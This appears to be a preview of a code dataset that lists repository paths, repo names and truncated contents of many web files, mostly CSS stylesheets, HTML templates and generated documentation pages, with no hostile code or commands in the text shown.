path
stringlengths
5
312
repo_name
stringlengths
5
116
content
stringlengths
2
1.04M
docs/website/gcomprisblack.css
afenkart/gcompris-devel
/* CSS Document */ #HEADERRIGHT { position : absolute; top : 0px; right : 0%; z-index: 1; border: 0px solid; } #HEADERLOGO { position : absolute; left : 0%; top : 0px; z-index: 2; border: 0px solid; } #MENU { position : absolute; left : 5px; top : 640px; width : 200px; margin : 6px; bo...
wp-content/themes/btf/assets/css/main.css
asmith41/wp_btf
/* ========================================================================== Author's custom styles ========================================================================== */ /*Web Fonts*/ @font-face { font-family: 'proxima_nova_alt_rgbold'; src: url('../fonts/proxima_nova_alt_bold-webfont.eot'); ...
projects/complete_project/templates/account/signup.html
alon/polinax
{% extends "site_base.html" %} {% load i18n %} {% block head_title %}{% trans "Signup" %}{% endblock %} {% block body %} <div class="clearfix padtop"> <div id="basic-form"> <fieldset> <legend>{% trans "Sign Up" %}</legend> {% if user.is_authenticated %} ...
app/skins/_common2/css/reset.css
chisimba/chisimba
html, body, div, span, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, code, del, em, font, img, small, strike, strong, dl, dt, dd, ol, ul, li, fieldset, form, label, table, caption, tbody, tfoot, thead, tr, th, td { margin: 0; padding: 0; border: 0; outline: 0; font-size: 100%; vertical-alig...
demo/static/annotations/css/001/styles.css
PirateLearner/annotations
html, body { font-size: 14px; margin: 0; padding: 0; width: 100%; color: #212121; } nav { display: block; background-color: smokescreen; color: black; box-shadow: 0 2px 3px 0 rgba(33, 33, 33, 0.6); } section { position: relative; width: 100%; margin: 0 auto; } @media (min-width: 992px) { ...
src/consult/etudiant-notes.html
boubad/kitInfo
<template> <section class="au-animate"> <table if.bind="is_connected"> <tbody> <tr> <td style="text-align:center"> <connect-bar></connect-bar> </td> </tr> <tr> <td style="text-align:center"> <table> <tr> <td style="text-align:center"> <d...
assets/css/archive.css
liushoukai/liushoukai.github.io
/* -------------------------------- Modules - reusable parts of our design -------------------------------- */ .cd-container { /* this class is used to give a max-width to the element it is applied to, and center it horizontally when it reaches that max-width */ width: 90%; max-width: 1170px; margin:...
app/webroot/assets/css/elements.css
swiss-major-music/webapp
* { box-sizing: border-box; -moz-box-sizing: border-box; -webkit-box-sizing: border-box; } body, html { margin: 0; padding: 0; font-family: 'Open Sans', Arial, sans-serif; font-weight: 300; color: #333; min-width: 900px; } body.error { background-color: #222; margin-top: 10...
bdb/docs/api_c/c_index.html
NickeyWoo/mysql-3.23.49
<!--$Id: c_index.so,v 10.53 2000/12/21 19:11:27 bostic Exp $--> <!--Copyright 1997, 1998, 1999, 2000 by Sleepycat Software, Inc.--> <!--All rights reserved.--> <html> <head> <title>Berkeley DB: C Interface by Function/Structure</title> <meta name="description" content="Berkeley DB: An embedded database programmatic too...
src/main/webapp/ldapi-00/BenchmarkTest00947.html
h3xstream/Benchmark
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <script src="/benchmark/js/jquery.min.js"></script> <script type="text/javascript" src="/benchmark/js/js.cookie.js"></script> <title>Be...
app/code/Magento/ImportExport/view/adminhtml/web/css/importexport.css
kunj1988/Magento2
/** * Copyright © Magento, Inc. All rights reserved. * See COPYING.txt for license details. */ .import-error-wrapper { margin-top: 10px; } .import-error-list { max-height: 300px; overflow-y: auto; padding: 10px; background-color: #fcc; margin: 10px 0 0 0; }
scripts/extjs3/css/structure/box.css
pipifuyj/extplorer
/* * Ext JS Library 3.0 RC2 * Copyright(c) 2006-2009, Ext JS, LLC. * licensing@extjs.com * * http://extjs.com/license */ /* Creates rounded, raised boxes like on the Ext website - the markup isn't pretty: <div class="x-box-blue"> <div class="x-box-tl"><div class="x-box-tr"><div class="x-box-t...
ICO3D/Understand_ICO/Undestand-ICO3D/ICO3D_Understand_html/progunit_metrics_V.html
CK08/ICO
<html><head><title>Program Unit Metrics [V]</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/></head><body bgcolor="#ffffff" TEXT="#000000"><h2>Program Unit Metrics</h2><hr><pre> </pre><table BORDER CELLPADDING=4><tr><td>Non-Alpha</td><td><a href="progunit_metrics_A.html">A</a></td><td><a href=...
wulu/2015.11.23/qipai/qipaiyouxipingtai/2113.html
bylu/Test
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>Â齫ÓÎÏ·ÏÂÔØ Éú»î¿ìÀÖÎÞÇî</title> <meta name="keywords" content="Â齫ÓÎÏ·ÏÂÔØ£¬ÓÎÏ·ÏÂÔØ£¬Â齫ÓÎÏ·" /> <me...
App/views/checkInReservation.html
RCS337/HollyHotel
<h1>Checking in reservation</h1> <form> <div class="panel panel-default"> <div class="panel-heading"><h3 class="panel-title">Guest Information</h3></div> <div class="panel-body"> <div class="col-xs-6 form-group"> <input type="text" name="firstName" placeholder="First ...
a/zhishiku/hyzx/2014/1128/727.html
chuing/Push
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>2、社会医疗保险缴费月数:130-139个月_广州谱式达-人力资源-知识产权-工商财税-人才服务-户口手续办理</title> <meta...
html/docs/en/plugins.html
dnsmichi/icinga-core
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>5.1. Icinga Plugins</title> <link rel="stylesheet" href="../stylesheets/icinga-docs.css" type="text/css"> <meta name="generator" content="DocBook XSL Stylesheets V1.75.1"> <meta name="keywords" content="Supervision, Icinga, Nagios,...
doc/html/qextensionfactory.html
Distrotech/PyQt-x11
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd"> <html><head><title>QExtensionFactory Class Reference</title><style>h3.fn,span.fn { margin-left: 1cm; text-indent: -1cm } a:link { color: #004faf; text-decoration: none } a:visited { color: #6729...
deploy/templates/deploy/static.html
newyue588cc/sysops
{% extends 'base_deploy.html' %} {% block title %}ads static 上线 {% endblock %} {% block location %}当前位置:上线系统 >> ads-static上线 {% endblock %} {% block ads %} class="" {% endblock %} {% block ads-static %} class="active" {% endblock %}
external-libs/weka-stable-3.6/doc/weka/gui/ResultHistoryPanel.RMouseAdapter.html
powdream/manage_movie_files
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc (build 1.6.0_43) on Tue Dec 15 22:06:56 NZDT 2015 --> <TITLE> ResultHistoryPanel.RMouseAdapter </TITLE> <META NAME="date" CONTENT="2015-12-15"> <LINK REL ="styl...
public/jurado6/categoria_o.html
alfredoBorboa/tvynovelas-live
<!doctype html> <html> <head> <title>Votación Live Tv y Novelas 2015</title> <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport" /> <script src="../socket.io/socket.io.js"></script> <script src="../resources/jquery.min.js"></script> <link rel="stylesheet" ...
Protomorph/style.css
protomorph/modernbb-protomorph
/* ======================================================================= * PROTOMORPH STYLE FOR MORDERNBB v1.0 * ======================================================================= */ @-webkit-viewport { width: device-width; } @-moz-viewport { width: device-width; } @-ms-viewport { width: device-width; } ...
doxygen/html/classAcceleratorPlugin-members.html
mmp/pbrt-v1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <title>pbrt: Member List</title> <link href="tabs.css" rel="stylesheet" type="...
modules/views/help/style-fields.html
AbeerKhakwani/friday_asses_book_store
<<<<<<< HEAD The <strong>fields</strong> row style displays each field defined in the view, one after another. Each field defines its own output. By default, each field is put in a &lt;div&gt; unless it is selected to be <em>inline</em>. If it is inline, it is put in a &lt;span&gt;. Two items in &lt;div&gt;s will be d...
doc/unstable/commands/ChangeDecor.html
ThomasAdam/fvwm-web
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>ChangeDecor</title><link rel="stylesheet" href="./../style.css" type="text/css"><meta name="generator" content="DocBook XSL Stylesheets Vsnapshot_6661"></head><body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0...
_functions/get_lastpostdate.html
mgsolipa/b2evolution_phpxref
<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <html> <head> <title>PHPXRef 0.7.1 : Unnamed Project : Function Reference: get_lastpostdate()</title> <link rel="stylesheet" href="../sample.css" type="text/css"> <link rel="stylesheet" href="../sample...
web2py/applications/examples/static/epydoc/toc-gluon.compileapp-module.html
AbsentMoniker/ECE463Honors
<?xml version="1.0" encoding="ascii"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>compileapp</title> <link rel="stylesheet" href="epydoc.css" type="text/css" /> <script ty...
v1/webalizer/usage_200511.html
BalajiRamachandran/Ragamalika
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- Generated by The Webalizer Ver. 2.01-09-RB07 --> <!-- --> <!-- Copyright 1997-2000 Bradford L. Barrett --> <!-- (brad@mrunix.net http://www.mrunix.net) --> <!-- --> <...
Code/GetMetaDataFromCRAN/raw_html/cgAUC.html
esander91/NamespacePollution
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>CRAN - Package cgAUC</title> <link rel="stylesheet" type="text/css" href="../../CRAN_web.css" /> <meta http-equiv="Content-Type" content="text/html; cha...
assets/css/foundation.calendar.css
Tier27/aware
/* Responsive Calendar for Foundation */ .calendar { margin-left: 0; margin-bottom: 1.25rem; padding-bottom: 1px; border-bottom: 2px solid #2ba6cb; } .calendar * { list-style: none; line-height: 1; } .calendar .title { text-align: center; font...
doc/api/platform/request_builder-pysrc.html
Arabidopsis-Information-Portal/PMR_API
<?xml version="1.0" encoding="ascii"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>request_builder</title> <link rel="stylesheet" href="epydoc.css" type="text/css" /> <scri...
wp-content/themes/exclusive/style.css
luismelo/intranet
/* Theme Name: Exclusive Theme URI: http://web-dorado.com/wordpress-themes/exclusive.html Author: web-dorado.com Author URI: http://web-dorado.com/ Description: Exclusive is a unique theme designed to best fit business style websites. It comes with a large list of customizable features, the back end is intuitive and ea...
solr-5.0.0/docs/solr-core/org/apache/solr/core/class-use/RequestHandlers.LazyRequestHandlerWrapper.html
annieweng/solr_example
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (version 1.7.0_55) on Sun Feb 15 12:26:30 PST 2015 --> <meta http-equiv="Content-Type" content="text/html" charset="utf-8"> <title>Uses of Class org.a...
doc/IncrementTradesGetResponse_8cpp.html
sd44/TaobaoCppQtSDK
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <meta http-equiv="X-UA-Compatible" content="IE=9"/> <meta name="generator" con...
docs/classArActionTriangleDriveTo-members.html
charismaticchiu/Robotics
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html><head><meta http-equiv="Content-Type" content="text/html;charset=iso-8859-1"> <title>Aria: Member List</title> <link href="doxygen.css" rel="stylesheet" type="text/css"> </head><body> <!-- Generated by Doxygen 1.4.2 --> <div class="qindex"><a class="...
Coding/Python/scipy-html-0.16.1/generated/scipy.linalg.lapack.sgerqf.html
platinhom/ManualHom
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>scipy.linalg.lapack.sgerqf &mdash; SciPy v0.16.1 Reference Guide</title> <link rel="stylesheet" type="text/css" href="../static_/css/spc-bootstrap.css"> <link rel="stylesheet" type="text/css" href="../static_/css/spc-extend.css"> ...
docs/reference/update.enumerate_parsimony.html
pbastide/Phylogenetic-EM
<!-- Generated by pkgdown: do not edit by hand --> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Actualization of the enumeration. — update.enumerate_parsimony • PhylogeneticEM...
sites/default/files/otros/01F_Rafael_Gaya/espanol/funcional/c01.html
monocromatico/cintita
<HTML> <HEAD> <TITLE>c01</TITLE> </HEAD> <BODY bgcolor="#FFFFFF"> <!-- URL's used in the movie--> <p align="center"> <A HREF=mailto:contacto@firmagaya.com></A> <!-- text used in the movie--> <!--MESA Clave: AF-3 Técnica: madera pintada a mano Medidas: variable Si desea adquirir esta obra contáctenos: --><OBJECT...
html/classInList.html
kartikram3/zsim
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <meta http-equiv="X-UA-Compatible" content="IE=9"/> <meta name="generator" con...
doc/html/dc/d9d/classtops_1_1ContextTreeNode-members.html
topsframework/topsframework.github.io
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <meta http-equiv="X-UA-Compatible" content="IE=9"/> <title>ToPS: Member List</...
profiles/conference/modules/contrib/inline/plugins/node/node.css
pinxi/training
/* $Id: node.css,v 1.1 2009/08/08 06:56:43 sun Exp $ */ .mceItemDrupalImage { border: 1px dotted #cc0000; background-image: url('images/img_assist.gif'); background-position: center; background-repeat: no-repeat; background-color: #ffffcc; }
app/src/main/assets/html/en/Ka_C01_S01_V14.html
SrirangaDigital/shankara-android
<html> <head> <meta charset="UTF-8"> <link rel="stylesheet" href="assets/stylesheet-en.css" /> </head> <body class="eng"> <div class='verse' id='Ka_C01_S01_V14' type='mantra'> <div class='versetext'>pra tē bravīmi tadu mē nibōdha svargyamagniṁ nacikētaḥ prajānan । <br/> anantalōkāptimathō pratiṣṭhāṁ viddhi tvamētaṁ...
index.html
ManojitBallav/3D-Mapping
<html> <head> <title>3D World</title> <meta charset="utf-8"> <meta name=viewport content="width=device-width, initial-scale=1"> <link href='http://fonts.googleapis.com/css?family=Raleway:200' rel='stylesheet' type='text/css'> <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.4/j...
external-libs/weka-stable-3.6/doc/weka/core/Trie.html
powdream/manage_movie_files
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc (build 1.6.0_43) on Tue Dec 15 22:06:40 NZDT 2015 --> <TITLE> Trie </TITLE> <META NAME="date" CONTENT="2015-12-15"> <LINK REL ="stylesheet" TYPE="text/css" HREF...
wp-content/themes/infocus/styles/green.css
seankooler/wordpress
/* inFocus v3.0 - green */ .colorscheme_bg,.wp-pagenavi .current,.paged-navigation .current, body,body>.multibg>.multibg,#footer,#footer>.multibg>.multibg, .post_more_link,#intro .intro_title,.jqueryslidemenu ul ul, .call_to_action_button,.call_to_action_button span,.about_author_module .avatar, .about_author_title,...
source_data/2004/stats/Rutgers.html
vrivellino/cfs
<!DOCTYPE html> <html itemscope itemtype="http://schema.org/website" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/" lang="en"> <head> <title>2004 Rutgers Scarlet Knights Statistics | College Football at Sports-Reference.com</title> <script type="text/javascript">var sr_gzip...
.phpDocumentation/CHMdefaultConverter/Joomla-Site/com_mailto/_com_mailto---views---mailto---tmpl---default.php.html
srgg6701/WebApps
<!-- IE 6 makes the page to wide with the following doctype. I accept standards if they help me, not if they make anything even harder! //--> <!--<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.0 Transitional//EN' 'http://www.w3.org/TR/REC-html40/loose.dtd'>//--> <!--NewPage--> <HTML> <HEAD> <!-- Generated by PhpDoc date:...
manuals/bdb-3.html
mbrock/bigloo-llvm
<!-- 95% W3C COMPLIANT, 95% CSS FREE, RAW HTML --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html;charset=ISO-8859-1"> <title>Bdb</title> <style type="text/css"> <!-- pre { font-family: monospace } tt { font-family: monospace } c...
app/assets/javascripts/bastion/layouts/details-nutupane.html
steveloranz/bastion
<section> <div data-block="messages" bst-alerts success-messages="successMessages" error-messages="errorMessages"></div> <h4> <span data-block="header"></span> </h4> <div> <span data-block="filters"></span> </div> <div class="row nutupane-details-bar"> <div class="col-sm-4"> <div data-b...
bin/physicsdemo.html
PhastPhood/draft
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"/> <title>physicsdemo</title> <meta name="description" content="" /> <script src="js/swfobject.js"></script> <script> var flashvars = { }; var params = { menu: "false", scale: "noScale", allowFullscreen: "true", allowScr...
documentation/javadoc/com/redhat/rhn/domain/monitoring/command/CommandGroup.html
colloquium/spacewalk
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc (build 1.6.0_18) on Tue Nov 02 13:16:47 CET 2010 --> <TITLE> CommandGroup </TITLE> <META NAME="date" CONTENT="2010-11-02"> <LINK REL ="stylesheet" TYPE="text/cs...
course-tool/src/webapp/content/modulos/exercicios/m2a1e5.html
mupi/readinweb
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <link rel="stylesheet" type="text/css" href="../../../../readinweb-tool/content/modulos/exercicios/css/m2a1e2.css"/> <script type="text/javascript" src="../../../../readinweb-to...
application/admin/view/default/content/comment_editor.html
levisun/NiPHPTP5
<menu> <a href="{:url('', array('pass' => 'pass'))}" class="btn btn-default"><span class="icon-eye-close"></span>{:lang('button unexamined')}</a> <a href="{:url('', array('report' => 'report'))}" class="btn btn-default"><span class="icon-warning-sign"></span>{:lang('button report')}</a> <a href="{:url()}" class="btn...
java-doc/oovu/addressing/tests/Test__OscAddressNode__get_debug_pieces.html
josiah-wolf-oberholtzer/oovu
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc (build 1.6.0_51) on Tue Oct 01 15:44:31 EDT 2013 --> <TITLE> Test__OscAddressNode__get_debug_pieces </TITLE> <META NAME="date" CONTENT="2013-10-01"> <LINK REL =...
doc/classSimbaAdgroupUpdateRequest.html
sd44/TaobaoCppQtSDK
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <meta http-equiv="X-UA-Compatible" content="IE=9"/> <meta name="generator" con...
Code/GetMetaDataFromCRAN/raw_html/backShift.html
esander91/NamespacePollution
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>CRAN - Package backShift</title> <link rel="stylesheet" type="text/css" href="../../CRAN_web.css" /> <meta http-equiv="Content-Type" content="text/html;...
templates/default/newcalendarentry.html
adrianbroher/thwboard
<table width="100%" border="0" cellspacing="0" cellpadding="0" class="border-col"> <tr> <td> <table width="100%" border="0" cellspacing="1" cellpadding="0"> <tr class="color4"> <td height="18"> $style[smallfont]<span style="color:$style...
application/views/blog-post.html
BrendaManrique/aquolity
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content=""> <meta name="author" content=""> <title>Blog Post - Modern Business - Start Bootstrap Template</title> <!-- Bootstrap core ...
arduino/code/myrobotlab-1.0.119/javadoc/org/myrobotlab/service/interfaces/StepperController.html
glaudiston/project-bianca
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <title>StepperController</title> <link rel="stylesheet" type="text/css" href="../../../../stylesheet.css" title="Style"> </head> <body> <script type="text/javascript"><!-- ...
codefolio/client/templates/contact.html
TimeBandit/meteor-training-apps
<template name="contact"> <!-- +++++ Contact Section +++++ --> <div class="container pt"> <div class="row mt"> <div class="col-lg-6 col-lg-offset-3 centered"> <h3>CONTACT ME</h3> <hr> <p>It is a long established fact that a reader will be distr...
javascript/scribite_editors/fckeditor/editor/dialog/fck_source.html
grlf/eyedock
<!-- * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == * * Licensed under the terms of any of the following licenses at your * choice: * * - GNU General Public License Version 2 or later (the "GPL") * http:...
pdl_test_bench_envsettings.html
praveendath92/securePUF
<HTML><HEAD><TITLE>Xilinx System Settings Report</TITLE></HEAD> <BODY TEXT='#000000' BGCOLOR='#FFFFFF' LINK='#0000EE' VLINK='#551A8B' ALINK='#FF0000'> <center><big><big><b>System Settings</b></big></big></center><br> <A NAME="Environment Settings"></A> &nbsp;<BR><TABLE BORDER CELLSPACING=0 CELLPADDING=3 WIDTH='100%'> <...
Documentation/nvme-write.html
jderrick/nvme-cli
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="application/xhtml+xml; charset=UTF-8" /> <meta name="generator" content="AsciiDoc 8.6.7" /> <title>nvme-wr...
css/teal.css
ucsf-drupal/teal
/* * This is the centralized import location. Do not write styles in this file */ /****************************************************************************** Compass Specific imports */ /* line 58, ../scss/_colors.scss */ body { background-color: #4d737a; color: #4d4e4e; } /* line 62, ../scss/_colors...
Coding/W3School/W3Schools_Offline_2015/www.w3schools.com/bootstrap/trybs_txt_hn.html
platinhom/ManualHom
<!DOCTYPE html> <html lang="en"> <!-- Mirrored from www.w3schools.com/bootstrap/trybs_txt_hn.htm by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 08:14:19 GMT --> <head> <title>Bootstrap Example</title> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <lin...
doc/html/classSBStuffEphem-members.html
mlytvyn80/SteelBreeze
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <title>SteelBreeze Reference Manual: Member List</title> <link href="tabs.css...
_site/cv/index.html
cyrusmaher/cyrusmaher.github.io
<!doctype html> <!--[if lt IE 7]><html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="en"> <![endif]--> <!--[if (IE 7)&!(IEMobile)]><html class="no-js lt-ie9 lt-ie8" lang="en"><![endif]--> <!--[if (IE 8)&!(IEMobile)]><html class="no-js lt-ie9" lang="en"><![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en"><!--<!...
web/templates/base.html
Itxaka/Gobolino
<!DOCTYPE html> <html> <head> <title></title> <link href="{{ url_for("static", filename="css/bootstrap.min.css") }}" rel="stylesheet"> <link href="{{ url_for("static", filename="css/bootstrap-theme.min.css") }}" rel="stylesheet"> <link href="{{ url_for("static", filename="css/font-awesome.css") }}" rel=...
themeforest-5194599-flat-kit-premium-bootstrap-3-app-template/html/admin/light-menus/boxed-layout/accordion-left-menu/modals.html
dlamprea/door_learning
<!DOCTYPE html> <!--[if lt IE 7]> <html class="ie lt-ie9 lt-ie8 lt-ie7 fixed top-full menuh-top sidebar sidebar-full sidebar-collapsible sidebar-width-mini sidebar-hat"> <![endif]--> <!--[if IE 7]> <html class="ie lt-ie9 lt-ie8 fixed top-full menuh-top sidebar sidebar-full sidebar-collapsible sidebar-width-mini side...
external-libs/weka-stable-3.6/doc/weka/core/pmml/FieldRef.html
powdream/manage_movie_files
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc (build 1.6.0_43) on Tue Dec 15 22:06:41 NZDT 2015 --> <TITLE> FieldRef </TITLE> <META NAME="date" CONTENT="2015-12-15"> <LINK REL ="stylesheet" TYPE="text/css" ...
toolchain/arm_cm0/share/doc/gcc-arm-none-eabi/html/gccint/Passes.html
jocelynmass/nrf51
<html lang="en"> <head> <title>Passes - GNU Compiler Collection (GCC) Internals</title> <meta http-equiv="Content-Type" content="text/html"> <meta name="description" content="GNU Compiler Collection (GCC) Internals"> <meta name="generator" content="makeinfo 4.8"> <link title="Top" rel="start" href="index.html#Top"> <li...
public/html/wxweb/exchange.html
yijingping/nodejs-bwtech
<div class="container"> <div class="top-nav"> <span class="nav-title">积分兑换</span> <div class="nav-triangle"></div> </div> <div class="main"> <div class="page-title"> <span>当前汇率</span> <span class="exchange-rate">[[getRate()]]</span> <img class="icon-down" src="/img/icon_down.png" ng...
WebContent/histogram.html
mike-gill/geophysics-viewer-js
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Insert title here</title> <link rel="stylesheet" type="text/css" href="css/dc.css"/> <script type="text/javascript" src="lib/d3.v3.min.js" charset="utf-8"></script> <script type="text/javascript" src="lib/crossfilter.min.js"></script> <script...
mesa_regalos/themes/found/css/datatables/data-tables-style.css
JotaOwen/M-R
.dataTables_wrapper { clear: both; position: relative; } .dataTables_length { background-color: rgba(220, 220, 220, 0.3); border-bottom: 1px solid #D1D7DF; float: left; width: 50%; } .dataTables_wrapper label { height: 30px; line-height: 30px; margin: 10px 0; padding: 0 10px; }...
pages/platforms/v3_2/android/javadoc/com/affectiva/android/affdex/sdk/detector/Face.Appearance.html
Affectiva/developerportal
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (version 1.7.0_51) on Tue Jan 24 09:57:50 EST 2017 --> <title>Face.Appearance (Affdex Android SDK Java Documentation)</title> <meta name="date" conten...
Binaries/gcgv/Content/StartPage_Loading.html
Grauniad/Call-Graph-Viewer
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="description" content=""> <meta name="author" content=""> <link rel="icon" href="../../favicon.ic...
templates/quiz/category_not_found.html
videntity/tweatwell
{% extends "base.html" %} {% block middle %} <h1> Well this is embarrasing. This category does not exist.</h1> <p>Please contact the <a HREF="mailto:jpunteney@geniusrocket.com">site administrator.</a> </p> {% endblock %}
lib/docs/apidocs/org/apache/poi/ss/formula/CollaboratingWorkbooksEnvironment.WorkbookNotFoundException.html
setu9760/Jade_project_repo
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="ru"> <head> <title>CollaboratingWorkbooksEnvironment.WorkbookNotFoundException (POI API Documentation)</title> <link rel="stylesheet" type="text/css" href="../../../../../stylesheet.c...
Application/Admin/View/User/admin-table-doctor.html
freyo/Online-Service-Center-for-CQJTU
<include file="Public/header" /> <include file="Public/topbar" /> <div class="am-cf admin-main"> <!-- sidebar start --> <include file="Public/sidebar" /> <!-- sidebar end --> <!-- content start --> <div class="admin-content"> <div class="am-cf am-padding"> <div class="am-fl am-cf"><strong class="a...
client/views/participants/allParticipants.html
djhi/mysessions---OLD
